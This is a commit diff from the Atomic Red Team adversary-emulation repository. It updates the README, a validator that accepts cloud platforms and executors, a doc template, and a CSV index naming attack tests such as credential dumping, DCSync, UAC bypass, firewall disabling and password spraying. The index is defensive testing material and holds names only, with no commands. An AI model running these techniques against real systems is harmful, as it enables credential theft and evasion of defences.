Added Mshta example without external file call.

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
T1543.004 - Updated cleanup key (#1553 )
2021-07-26 13:05:44 -07:00 · 2021-07-19 21:21:58 +00:00 · 2021-07-19 15:21:15 -06:00 · 2021-07-19 21:20:24 +00:00 · 2021-07-19 15:19:59 -06:00 · 2021-07-19 15:15:04 -06:00
310 changed files with 8682 additions and 1189 deletions
@@ -24,3 +24,6 @@ docs/.sass-cache/
 docs/_site/
 **/Invoke-AtomicTest-ExecutionLog.csv
 techniques_hash.db
+
+# Credential files 
+*.creds
@@ -12,7 +12,7 @@ GEM
      minitest (~> 5.1)
      tzinfo (~> 1.1)
      zeitwerk (~> 2.2, >= 2.2.2)
-    addressable (2.7.0)
+    addressable (2.8.0)
      public_suffix (>= 2.0.2, < 5.0)
    coffee-script (2.4.1)
      coffee-script-source
@@ -1,59 +1,39 @@
 <p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>

 # Atomic Red Team
+
 [![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)

-Atomic Red Team allows every security team to test their controls by executing simple
-"atomic tests" that exercise the same techniques used by adversaries (all mapped to
-[Mitre's ATT&CK](https://attack.mitre.org)).
+Atomic Red Team is library of tests mapped to the
+[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
+Atomic Red Team to quickly, portably, and reproducibly test their environments.

-## Philosophy
+## Get started

-Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
-focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
+You can execute atomic tests directly from the command line, no installation
+required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
+page of our wiki.

-Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
-  Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
-  what our controls and program can detect, and what it cannot. We don’t have to detect every adversary, but we
-  do believe in knowing our blind spots.
+For a more robust testing experience, consider using an execution framework like
+[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).

- **We should be able to run a test in less than five minutes.**
-  Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
-  We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
-  run in a few minutes.
+## Learn more

-  The best test is the one you actually run.
+The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).

- **We need to keep learning how adversaries are operating.**
-  Most security teams don’t have the benefit of seeing a wide variety of adversary types and techniques crossing
-  their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
-  which makes the community working together essential to making us all better.
+For information about the philosophy and development of Atomic Red Team, visit
+our website at <https://atomicredteam.io>.

-See: https://atomicredteam.io
+## Contribute to Atomic Red Team

-## Having trouble?
+Atomic Red Team is open source and community developed. If you're interested in
+becoming a contributor, check out these resources:

-Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
-
-## Getting Started
-
-* [Getting Started With Atomic Red Team](https://github.com/redcanaryco/atomic-red-team/wiki/About-Atomic-Red-Team)
-* Automated Test Execution with the [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/wiki/Executing-Atomic-Tests#execute-an-atomic-test-with-an-execution-framework)
-* Peruse the Complete list of Atomic Tests ([md](atomics/Indexes/Indexes-Markdown/index.md), [csv](atomics/Indexes/Indexes-CSV/index.csv)) and the [ATT&CK Matrix](atomics/Indexes/Matrices/matrix.md)
-  - Windows [Matrix](atomics/Indexes/Matrices/windows-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/windows-index.md), [csv](atomics/Indexes/Indexes-CSV/windows-index.csv))
-  - MacOS [Matrix](atomics/Indexes/Matrices/macos-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/macos-index.md), [csv](atomics/Indexes/Indexes-CSV/macos-index.csv))
-  - Linux [Matrix](atomics/Indexes/Matrices/linux-matrix.md) and tests by tactic ([md](atomics/Indexes/Indexes-Markdown/linux-index.md), [csv](atomics/Indexes/Indexes-CSV/linux-index.csv))
-* Using [ATT&CK Navigator](https://github.com/mitre-attack/attack-navigator)? Check out our coverage layers ([All](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json), [Windows](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json), [MacOS](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json), [Linux](atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json))
-* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) your own modifications
-* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
-    * Need a Slack invitation? Submit an invite request via this [Google Form](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)
-
-## Code of Conduct
-
-In order to have a more open and welcoming community, Atomic Red Team adheres to a
-[code of conduct](CODE_OF_CONDUCT.md).
-
-## License
-
-See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+- Join our [Slack workspace](https://slack.atomicredteam.io) and get involved
+  with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
+  before you join.
+- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
+- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+  for more information about contributing directly to this repository.
+- Check the [license](LICENSE.txt) for information regarding the distribution
+  and modification of Atomic Red Team.
@@ -25,13 +25,17 @@
  end
 end.join(', ') %>

+
+**auto_generated_guid:** <%= test['auto_generated_guid'] %>
+
+
 <%def cleanup(input)
    input.to_s.strip.gsub(/\\/,"&#92;")
 end%>

 <% if test['input_arguments'].to_a.count > 0 %>
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 <% test['input_arguments'].each do |arg_name, arg_options| -%>
 | <%= cleanup(arg_name) %> | <%= cleanup(arg_options['description']) %> | <%= cleanup(arg_options['type']) %> | <%= cleanup(arg_options['default']) %>|
@@ -75,7 +79,7 @@ end%>
 ##### Description: <%= dep['description'].strip  %>
 ##### Check Prereq Commands:
 ```<%= get_language(dependency_executor) %>
-<%= dep['prereq_command'].strip %> 
+<%= dep['prereq_command'].strip %>
 ```
 ##### Get Prereq Commands:
 ```<%= get_language(dependency_executor) %>
@@ -108,7 +108,7 @@ class AtomicRedTeam
      raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
      raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
  
-      valid_supported_platforms = ['windows', 'macos', 'linux']
+      valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
      atomic['supported_platforms'].each do |platform|
        if !valid_supported_platforms.include?(platform)
          raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
@@ -142,7 +142,7 @@ class AtomicRedTeam
      raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
      raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
  
-      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
+      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud', 'kubectl']
      case executor['name']
        when 'manual'
          raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
                                         string: executor['steps'],
                                         string_description: "atomic_tests[#{i}].executor.steps"

-        when 'command_prompt', 'sh', 'bash', 'powershell'
+        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud', 'kubectl'
          raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
          raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)

@@ -51,6 +51,15 @@ atomic_tests:
  # - windows
  # - macos
  # - linux
+  # - office-365
+  # - azure-ad
+  # - google-workspace
+  # - saas
+  # - iaas
+  # - containers
+  # - iaas:gcp
+  # - iaas:azure
+  # - iaas:aws
  supported_platforms:
    - windows

@@ -106,6 +115,7 @@ atomic_tests:
  # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
  # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
  # and `bash` when working on linux OSes.
+  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, `gcloud` and `kubectl`.
  executors:
  # the name of the executor describes the framework or application in which the test should be executed.
  #
@@ -5,20 +5,25 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
+credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
+credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash
 credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
-credential-access,T1003.006,DCSync,1,DCSync,129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
+credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
-credential-access,T1558.001,Golden Ticket,1,Crafting golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
+credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
 credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt
 credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell
 credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell
@@ -50,17 +55,22 @@ credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
+credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
 credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt
 credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
-credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,1,Brute Force Credentials of all Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
+credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
+credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
-credential-access,T1110.003,Password Spraying,3,Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
+credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
+credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
+credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
@@ -118,6 +128,7 @@ privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using Co
 privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -159,6 +170,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4
 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
 privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
 privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
+privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
+privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
 privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
 privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
@@ -188,6 +201,7 @@ privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-
 privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
 privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
 privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
+privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file,  Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
 privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
 privilege-escalation,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
@@ -215,6 +229,7 @@ defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using Compute
 defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
+defense-evasion,T1548.002,Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -260,10 +275,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -313,7 +329,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500
 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -348,9 +364,12 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
+defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -414,7 +433,7 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e
 defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
 defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
-defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
+defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
@@ -476,6 +495,10 @@ persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debu
 persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
+persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
+persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
+persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
+persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
 persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
 persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -494,6 +517,7 @@ persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-
 persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
